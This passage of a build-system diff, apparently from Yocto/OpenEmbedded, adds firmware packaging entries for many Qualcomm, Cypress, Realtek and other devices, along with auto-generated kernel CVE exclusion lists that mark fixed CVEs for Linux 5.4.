+FILES_${PN}-lt9611uxc = "${nonarch_base_libdir}/firmware/lt9611uxc_fw.bin"
+
 # For marvell
 LICENSE_${PN}-pcie8897 = "Firmware-Marvell"
 LICENSE_${PN}-pcie8997 = "Firmware-Marvell"
@@ -477,6 +516,13 @@ FILES_${PN}-netronome = " \
   ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0096*.nffw \
   ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0097*.nffw \
   ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0099*.nffw \
+  ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0011_2x40.nffw \
+  ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0012_2x40.nffw \
+  ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0078-0011_1x100.nffw \
+  ${nonarch_base_libdir}/firmware/netronome/bpf \
+  ${nonarch_base_libdir}/firmware/netronome/flower \
+  ${nonarch_base_libdir}/firmware/netronome/nic \
+  ${nonarch_base_libdir}/firmware/netronome/nic-sriov \
 "
 
 RDEPENDS_${PN}-netronome += "${PN}-netronome-license"
@@ -501,6 +547,17 @@ FILES_${PN}-nvidia-license = "${nonarch_base_libdir}/firmware/LICENCE.nvidia"
 
 RDEPENDS_${PN}-nvidia-gpu += "${PN}-nvidia-license"
 RDEPENDS_${PN}-nvidia-tegra += "${PN}-nvidia-license"
+RDEPENDS_${PN}-nvidia-tegra-k1 += "${PN}-nvidia-license"
+
+# For RSI RS911x WiFi
+LICENSE_${PN}-rs9113 = "WHENCE"
+LICENSE_${PN}-rs9116 = "WHENCE"
+
+FILES_${PN}-rs9113 = " ${nonarch_base_libdir}/firmware/rsi/rs9113*.rps "
+FILES_${PN}-rs9116 = " ${nonarch_base_libdir}/firmware/rsi/rs9116*.rps "
+
+RDEPENDS_${PN}-rs9113 += "${PN}-whence-license"
+RDEPENDS_${PN}-rs9116 += "${PN}-whence-license"
 
 # For rtl
 LICENSE_${PN}-rtl8188 = "Firmware-rtlwifi_firmware"
@@ -509,6 +566,7 @@ LICENSE_${PN}-rtl8192ce = "Firmware-rtlwifi_firmware"
 LICENSE_${PN}-rtl8192su = "Firmware-rtlwifi_firmware"
 LICENSE_${PN}-rtl8723 = "Firmware-rtlwifi_firmware"
 LICENSE_${PN}-rtl8821 = "Firmware-rtlwifi_firmware"
+LICENSE_${PN}-rtl8822 = "Firmware-rtlwifi_firmware"
 LICENSE_${PN}-rtl-license = "Firmware-rtlwifi_firmware"
 LICENSE_${PN}-rtl8168 = "WHENCE"
 
@@ -536,6 +594,11 @@ FILES_${PN}-rtl8821 = " \
 FILES_${PN}-rtl8168 = " \
   ${nonarch_base_libdir}/firmware/rtl_nic/rtl8168*.fw \
 "
+FILES_${PN}-rtl8822 = " \
+  ${nonarch_base_libdir}/firmware/rtl_bt/rtl8822*.bin \
+  ${nonarch_base_libdir}/firmware/rtw88/rtw8822*.bin \
+  ${nonarch_base_libdir}/firmware/rtlwifi/rtl8822*.bin \
+"
 
 RDEPENDS_${PN}-rtl8188 += "${PN}-rtl-license"
 RDEPENDS_${PN}-rtl8192ce += "${PN}-rtl-license"
@@ -543,6 +606,7 @@ RDEPENDS_${PN}-rtl8192cu += "${PN}-rtl-license"
 RDEPENDS_${PN}-rtl8192su = "${PN}-rtl-license"
 RDEPENDS_${PN}-rtl8723 += "${PN}-rtl-license"
 RDEPENDS_${PN}-rtl8821 += "${PN}-rtl-license"
+RDEPENDS_${PN}-rtl8822 += "${PN}-rtl-license"
 RDEPENDS_${PN}-rtl8168 += "${PN}-whence-license"
 
 # For ti-connectivity
@@ -602,7 +666,9 @@ FILES_${PN}-bcm4329 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4329-sdio.bi
 FILES_${PN}-bcm4330 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4330-sdio.*"
 FILES_${PN}-bcm4334 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4334-sdio.bin"
 FILES_${PN}-bcm4335 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4335-sdio.bin"
-FILES_${PN}-bcm4339 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4339-sdio.bin"
+FILES_${PN}-bcm4339 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4339-sdio.bin \
+  ${nonarch_base_libdir}/firmware/cypress/cyfmac4339-sdio.bin \
+"
 FILES_${PN}-bcm43241b0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b0-sdio.bin"
 FILES_${PN}-bcm43241b4 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b4-sdio.bin"
 FILES_${PN}-bcm43241b5 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b5-sdio.bin"
@@ -611,12 +677,18 @@ FILES_${PN}-bcm43143 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43143.bin \
   ${nonarch_base_libdir}/firmware/brcm/brcmfmac43143-sdio.bin \
 "
 FILES_${PN}-bcm43430a0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430a0-sdio.*"
-FILES_${PN}-bcm43455 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43455-sdio.*"
+FILES_${PN}-bcm43455 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43455-sdio.* \
+  ${nonarch_base_libdir}/firmware/cypress/cyfmac43455-sdio.* \
+"
 FILES_${PN}-bcm4350c2 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350c2-pcie.bin"
 FILES_${PN}-bcm4350 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350-pcie.bin"
-FILES_${PN}-bcm4356 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-sdio.bin"
+FILES_${PN}-bcm4356 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-sdio.* \
+  ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-sdio.* \
+"
 FILES_${PN}-bcm43569 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43569.bin"
-FILES_${PN}-bcm43570 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43570-pcie.bin"
+FILES_${PN}-bcm43570 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43570-pcie.bin \
+  ${nonarch_base_libdir}/firmware/cypress/cyfmac43570-pcie.bin \
+"
 FILES_${PN}-bcm4358 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4358-pcie.bin"
 FILES_${PN}-bcm43602 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.bin \
   ${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.ap.bin \
@@ -687,13 +759,22 @@ LICENSE_${PN}-cypress-license = "Firmware-cypress"
 FILES_${PN}-cypress-license = "${nonarch_base_libdir}/firmware/LICENCE.cypress"
 
 FILES_${PN}-bcm-0bb4-0306 = "${nonarch_base_libdir}/firmware/brcm/BCM-0bb4-0306.hcd"
-FILES_${PN}-bcm43340 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43340-sdio.*"
-FILES_${PN}-bcm43362 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43362-sdio.*"
-FILES_${PN}-bcm43430 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430-sdio.*"
-FILES_${PN}-bcm4354 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4354-sdio.bin"
-FILES_${PN}-bcm4356-pcie = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-pcie.*"
+FILES_${PN}-bcm43340 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43340-sdio.* \
+  ${nonarch_base_libdir}/firmware/cypress/cyfmac43340-sdio.*"
+FILES_${PN}-bcm43362 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43362-sdio.* \
+  ${nonarch_base_libdir}/firmware/cypress/cyfmac43362-sdio.*"
+FILES_${PN}-bcm43430 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430-sdio.* \
+  ${nonarch_base_libdir}/firmware/cypress/cyfmac43430-sdio.*"
+FILES_${PN}-bcm4354 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4354-sdio.bin \
+  ${nonarch_base_libdir}/firmware/cypress/cyfmac4354-sdio.bin \
+"
+FILES_${PN}-bcm4356-pcie = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-pcie.* \
+  ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-pcie.* \
+"
 FILES_${PN}-bcm4373 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.bin \
   ${nonarch_base_libdir}/firmware/brcm/brcmfmac4373.bin \
+  ${nonarch_base_libdir}/firmware/cypress/cyfmac4373-sdio.bin \
+  ${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.clm_blob \
 "
 
 LICENSE_${PN}-bcm-0bb4-0306 = "Firmware-cypress"
@@ -893,27 +974,100 @@ RDEPENDS_${PN}-qat        = "${PN}-qat-license"
 
 # For QCOM VPU/GPU and SDM845
 LICENSE_${PN}-qcom-license = "Firmware-qcom"
+LICENSE_${PN}-qcom-yamato-license = "Firmware-qcom-yamato"
+LICENSE_${PN}-qcom-venus-1.8 = "Firmware-qcom"
+LICENSE_${PN}-qcom-venus-4.2 = "Firmware-qcom"
+LICENSE_${PN}-qcom-venus-5.2 = "Firmware-qcom"
+LICENSE_${PN}-qcom-venus-5.4 = "Firmware-qcom"
+LICENSE_${PN}-qcom-vpu-1.0 = "Firmware-qcom"
+LICENSE_${PN}-qcom-vpu-2.0 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a2xx = "Firmware-qcom Firmware-qcom-yamato"
+LICENSE_${PN}-qcom-adreno-a3xx = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a4xx = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a530 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a630 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a650 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a660 = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8016-modem = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8016-wifi = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8096-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8096-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8096-modem = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-compute = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-modem = "Firmware-qcom"
+LICENSE_${PN}-qcom-sm8250-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-sm8250-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-sm8250-compute = "Firmware-qcom"
+
 FILES_${PN}-qcom-license   = "${nonarch_base_libdir}/firmware/LICENSE.qcom ${nonarch_base_libdir}/firmware/qcom/NOTICE.txt"
+FILES_${PN}-qcom-yamato-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom_yamato"
 FILES_${PN}-qcom-venus-1.8 = "${nonarch_base_libdir}/firmware/qcom/venus-1.8/*"
 FILES_${PN}-qcom-venus-4.2 = "${nonarch_base_libdir}/firmware/qcom/venus-4.2/*"
 FILES_${PN}-qcom-venus-5.2 = "${nonarch_base_libdir}/firmware/qcom/venus-5.2/*"
 FILES_${PN}-qcom-venus-5.4 = "${nonarch_base_libdir}/firmware/qcom/venus-5.4/*"
-FILES_${PN}-qcom-adreno-a3xx = "${nonarch_base_libdir}/firmware/qcom/a300_*.fw ${nonarch_base_libdir}/firmware/a300_*.fw"
-FILES_${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.*"
-FILES_${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*"
+FILES_${PN}-qcom-vpu-1.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-1.0/*"
+FILES_${PN}-qcom-vpu-2.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-2.0/*"
+FILES_${PN}-qcom-adreno-a2xx = "${nonarch_base_libdir}/firmware/qcom/leia_*.fw ${nonarch_base_libdir}/firmware/qcom/yamato_*.fw"
+FILES_${PN}-qcom-adreno-a3xx = "${nonarch_base_libdir}/firmware/qcom/a3*_*.fw ${nonarch_base_libdir}/firmware/a300_*.fw"
+FILES_${PN}-qcom-adreno-a4xx = "${nonarch_base_libdir}/firmware/qcom/a4*_*.fw"
+FILES_${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.fw*"
+FILES_${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.*"
+FILES_${PN}-qcom-adreno-a650 = "${nonarch_base_libdir}/firmware/qcom/a650*.*"
+FILES_${PN}-qcom-adreno-a660 = "${nonarch_base_libdir}/firmware/qcom/a660*.*"
+FILES_${PN}-qcom-apq8016-modem = "${nonarch_base_libdir}/firmware/qcom/apq8016/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/modem.mbn"
+FILES_${PN}-qcom-apq8016-wifi = "${nonarch_base_libdir}/firmware/qcom/apq8016/wcnss.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/WCNSS*"
+FILES_${PN}-qcom-apq8096-adreno = "${nonarch_base_libdir}/firmware/qcom/apq8096/a530_zap.mbn ${nonarch_base_libdir}/firmware/qcom/a530_zap.mdt"
+FILES_${PN}-qcom-apq8096-audio = "${nonarch_base_libdir}/firmware/qcom/apq8096/adsp*.*"
+FILES_${PN}-qcom-apq8096-modem = "${nonarch_base_libdir}/firmware/qcom/apq8096/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8096/modem*.* ${nonarch_base_libdir}/firmware/qcom/apq8096/wlanmdsp.mbn"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-compat = "${nonarch_base_libdir}/firmware/qcom/LENOVO/21BX"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*adsp*.* ${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/battmgr.jsn"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/qcdxkmsuc8280.mbn"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*cdsp*.*"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*slpi*.*"
+FILES_${PN}-qcom-sdm845-adreno = "${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*"
 FILES_${PN}-qcom-sdm845-audio = "${nonarch_base_libdir}/firmware/qcom/sdm845/adsp*.*"
 FILES_${PN}-qcom-sdm845-compute = "${nonarch_base_libdir}/firmware/qcom/sdm845/cdsp*.*"
 FILES_${PN}-qcom-sdm845-modem = "${nonarch_base_libdir}/firmware/qcom/sdm845/mba.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/modem*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/wlanmdsp.mbn"
+FILES_${PN}-qcom-sm8250-adreno = "${nonarch_base_libdir}/firmware/qcom/sm8250/a650*.*"
+FILES_${PN}-qcom-sm8250-audio = "${nonarch_base_libdir}/firmware/qcom/sm8250/adsp*.*"
+FILES_${PN}-qcom-sm8250-compute = "${nonarch_base_libdir}/firmware/qcom/sm8250/cdsp*.*"
 RDEPENDS_${PN}-qcom-venus-1.8 = "${PN}-qcom-license"
 RDEPENDS_${PN}-qcom-venus-4.2 = "${PN}-qcom-license"
 RDEPENDS_${PN}-qcom-venus-5.2 = "${PN}-qcom-license"
 RDEPENDS_${PN}-qcom-venus-5.4 = "${PN}-qcom-license"
-RDEPENDS_${PN}-qcom-adreno-a3xx = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-vpu-1.0 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-vpu-2.0 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a2xx = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a2xx = "${PN}-qcom-license ${PN}-qcom-yamato-license"
+RDEPENDS_${PN}-qcom-adreno-a4xx = "${PN}-qcom-license"
 RDEPENDS_${PN}-qcom-adreno-a530 = "${PN}-qcom-license"
 RDEPENDS_${PN}-qcom-adreno-a630 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a650 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a660 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8016-modem = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8016-wifi = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8096-audio = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8096-modem = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${PN}-qcom-license"
 RDEPENDS_${PN}-qcom-sdm845-audio = "${PN}-qcom-license"
 RDEPENDS_${PN}-qcom-sdm845-compute = "${PN}-qcom-license"
 RDEPENDS_${PN}-qcom-sdm845-modem = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sm8250-audio = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sm8250-compute = "${PN}-qcom-license"
+
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
 
 FILES_${PN}-liquidio = "${nonarch_base_libdir}/firmware/liquidio"
 
@@ -942,7 +1096,6 @@ LICENSE_${PN} = "\
     & Firmware-fw_sst_0f28 \
     & Firmware-go7007 \
     & Firmware-hfi1_firmware \
-    & Firmware-i2400m \
     & Firmware-ibt_firmware \
     & Firmware-it913x \
     & Firmware-IntcSST2 \
@@ -963,7 +1116,6 @@ LICENSE_${PN} = "\
     & Firmware-ralink-firmware \
     & Firmware-imx-sdma_firmware \
     & Firmware-siano \
-    & Firmware-tda7706-firmware \
     & Firmware-ti-connectivity \
     & Firmware-ti-keystone \
     & Firmware-ueagle-atm4-firmware \
@@ -996,3 +1148,6 @@ python populate_packages_prepend () {
 # Firmware files are generally not ran on the CPU, so they can be
 # allarch despite being architecture specific
 INSANE_SKIP = "arch"
+
+# Don't warn about already stripped files
+INSANE_SKIP:${PN} = "already-stripped"
diff --git a/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc b/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
index 4ad74a27e9..2d4429b6b4 100644
--- a/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
+++ b/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
@@ -1,4 +1,6 @@
 SUMMARY = "Sanitized set of kernel headers for the C library's use"
+HOMEPAGE = "https://www.kernel.org/"
+DESCRIPTION = "Designed to maintain an Application Programming Interface (API) stable version of the Linux headers"
 SECTION = "devel"
 LICENSE = "GPLv2"
 
diff --git a/meta/recipes-kernel/linux/cve-exclusion.inc b/meta/recipes-kernel/linux/cve-exclusion.inc
new file mode 100644
index 0000000000..efc8b09475
--- /dev/null
+++ b/meta/recipes-kernel/linux/cve-exclusion.inc
@@ -0,0 +1,13 @@
+# Kernel CVE exclusion file
+
+# https://nvd.nist.gov/vuln/detail/CVE-2020-29373
+# Patched in kernel since v5.6 ff002b30181d30cdfbca316dadd099c3ca0d739c
+# Backported in version v5.4.24 cac68d12c531aa3010509a5a55a5dfd18dedaa80
+CVE_CHECK_WHITELIST += "CVE-2020-29373"
+
+# https://nvd.nist.gov/vuln/detail/CVE-2022-39188
+# Patched in kernel since v5.19 b67fbebd4cf980aecbcc750e1462128bffe8ae15
+# Backported in version v5.4.212 c9c5501e815132530d741ec9fdd22657f91656bc
+# Backported in version v5.10.141 895428ee124ad70b9763259308354877b725c31d
+# Backported in version v5.15.65 3ffb97fce282df03723995f5eed6a559d008078e
+CVE_CHECK_WHITELIST += "CVE-2022-39188"
diff --git a/meta/recipes-kernel/linux/cve-exclusion_5.4.inc b/meta/recipes-kernel/linux/cve-exclusion_5.4.inc
new file mode 100644
index 0000000000..b0b33bcc1d
--- /dev/null
+++ b/meta/recipes-kernel/linux/cve-exclusion_5.4.inc
@@ -0,0 +1,9445 @@
+
+# Auto-generated CVE metadata, DO NOT EDIT BY HAND.
+# Generated at 2024-04-14 04:45:05.585211 for version 5.4.273
+
+python check_kernel_cve_status_version() {
+    this_version = "5.4.273"
+    kernel_version = d.getVar("LINUX_VERSION")
+    if kernel_version != this_version:
+        bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version))
+}
+do_cve_check[prefuncs] += "check_kernel_cve_status_version"
+
+# fixed-version: Fixed after version 2.6.12rc2
+CVE_CHECK_WHITELIST += "CVE-2003-1604"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2004-0230"
+
+# CVE-2005-3660 has no known resolution
+
+# fixed-version: Fixed after version 2.6.26rc5
+CVE_CHECK_WHITELIST += "CVE-2006-3635"
+
+# fixed-version: Fixed after version 2.6.19rc3
+CVE_CHECK_WHITELIST += "CVE-2006-5331"
+
+# fixed-version: Fixed after version 2.6.19rc2
+CVE_CHECK_WHITELIST += "CVE-2006-6128"
+
+# CVE-2007-3719 has no known resolution
+
+# fixed-version: Fixed after version 2.6.12rc2
+CVE_CHECK_WHITELIST += "CVE-2007-4774"
+
+# fixed-version: Fixed after version 2.6.24rc6
+CVE_CHECK_WHITELIST += "CVE-2007-6761"
+
+# fixed-version: Fixed after version 2.6.20rc5
+CVE_CHECK_WHITELIST += "CVE-2007-6762"
+
+# CVE-2008-2544 has no known resolution
+
+# CVE-2008-4609 has no known resolution
+
+# fixed-version: Fixed after version 2.6.25rc1
+CVE_CHECK_WHITELIST += "CVE-2008-7316"
+
+# fixed-version: Fixed after version 2.6.31rc6
+CVE_CHECK_WHITELIST += "CVE-2009-2692"
+
+# fixed-version: Fixed after version 2.6.23rc9
+CVE_CHECK_WHITELIST += "CVE-2010-0008"
+
+# fixed-version: Fixed after version 2.6.36rc5
+CVE_CHECK_WHITELIST += "CVE-2010-3432"
+
+# CVE-2010-4563 has no known resolution
+
+# fixed-version: Fixed after version 2.6.37rc6
+CVE_CHECK_WHITELIST += "CVE-2010-4648"
+
+# fixed-version: Fixed after version 2.6.38rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5313"
+
+# CVE-2010-5321 has no known resolution
+
+# fixed-version: Fixed after version 2.6.35rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5328"
+
+# fixed-version: Fixed after version 2.6.39rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5329"
+
+# fixed-version: Fixed after version 2.6.34rc7
+CVE_CHECK_WHITELIST += "CVE-2010-5331"
+
+# fixed-version: Fixed after version 2.6.37rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5332"
+
+# fixed-version: Fixed after version 3.2rc1
+CVE_CHECK_WHITELIST += "CVE-2011-4098"
+
+# fixed-version: Fixed after version 3.3rc1
+CVE_CHECK_WHITELIST += "CVE-2011-4131"
+
+# fixed-version: Fixed after version 3.2rc1
+CVE_CHECK_WHITELIST += "CVE-2011-4915"
+
+# CVE-2011-4916 has no known resolution
+
+# CVE-2011-4917 has no known resolution
+
+# fixed-version: Fixed after version 3.2rc1
+CVE_CHECK_WHITELIST += "CVE-2011-5321"
+
+# fixed-version: Fixed after version 3.1rc1
+CVE_CHECK_WHITELIST += "CVE-2011-5327"
+
+# fixed-version: Fixed after version 3.7rc2
+CVE_CHECK_WHITELIST += "CVE-2012-0957"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2119"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2136"
+
+# fixed-version: Fixed after version 3.5rc2
+CVE_CHECK_WHITELIST += "CVE-2012-2137"
+
+# fixed-version: Fixed after version 3.4rc6
+CVE_CHECK_WHITELIST += "CVE-2012-2313"
+
+# fixed-version: Fixed after version 3.4rc6
+CVE_CHECK_WHITELIST += "CVE-2012-2319"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2012-2372"
+
+# fixed-version: Fixed after version 3.4rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2375"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2390"
+
+# fixed-version: Fixed after version 3.5rc4
+CVE_CHECK_WHITELIST += "CVE-2012-2669"
+
+# fixed-version: Fixed after version 2.6.34rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2744"
+
+# fixed-version: Fixed after version 3.4rc3
+CVE_CHECK_WHITELIST += "CVE-2012-2745"
+
+# fixed-version: Fixed after version 3.5rc6
+CVE_CHECK_WHITELIST += "CVE-2012-3364"
+
+# fixed-version: Fixed after version 3.4rc5
+CVE_CHECK_WHITELIST += "CVE-2012-3375"
+
+# fixed-version: Fixed after version 3.5rc5
+CVE_CHECK_WHITELIST += "CVE-2012-3400"
+
+# fixed-version: Fixed after version 3.6rc2
+CVE_CHECK_WHITELIST += "CVE-2012-3412"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-3430"
+
+# fixed-version: Fixed after version 2.6.19rc4
+CVE_CHECK_WHITELIST += "CVE-2012-3510"
+
+# fixed-version: Fixed after version 3.5rc6
+CVE_CHECK_WHITELIST += "CVE-2012-3511"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-3520"
+
+# fixed-version: Fixed after version 3.0rc1
+CVE_CHECK_WHITELIST += "CVE-2012-3552"
+
+# Skipping CVE-2012-4220, no affected_versions
+
+# Skipping CVE-2012-4221, no affected_versions
+
+# Skipping CVE-2012-4222, no affected_versions
+
+# fixed-version: Fixed after version 3.4rc1
+CVE_CHECK_WHITELIST += "CVE-2012-4398"
+
+# fixed-version: Fixed after version 2.6.36rc4
+CVE_CHECK_WHITELIST += "CVE-2012-4444"
+
+# fixed-version: Fixed after version 3.7rc6
+CVE_CHECK_WHITELIST += "CVE-2012-4461"
+
+# fixed-version: Fixed after version 3.6rc5
+CVE_CHECK_WHITELIST += "CVE-2012-4467"
+
+# fixed-version: Fixed after version 3.7rc3
+CVE_CHECK_WHITELIST += "CVE-2012-4508"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2012-4530"
+
+# CVE-2012-4542 has no known resolution
+
+# fixed-version: Fixed after version 3.7rc4
+CVE_CHECK_WHITELIST += "CVE-2012-4565"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2012-5374"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2012-5375"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-5517"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2012-6536"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2012-6537"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2012-6538"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6539"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6540"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6541"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6542"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6543"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6544"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6545"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6546"
+
+# fixed-version: Fixed after version 3.6rc1
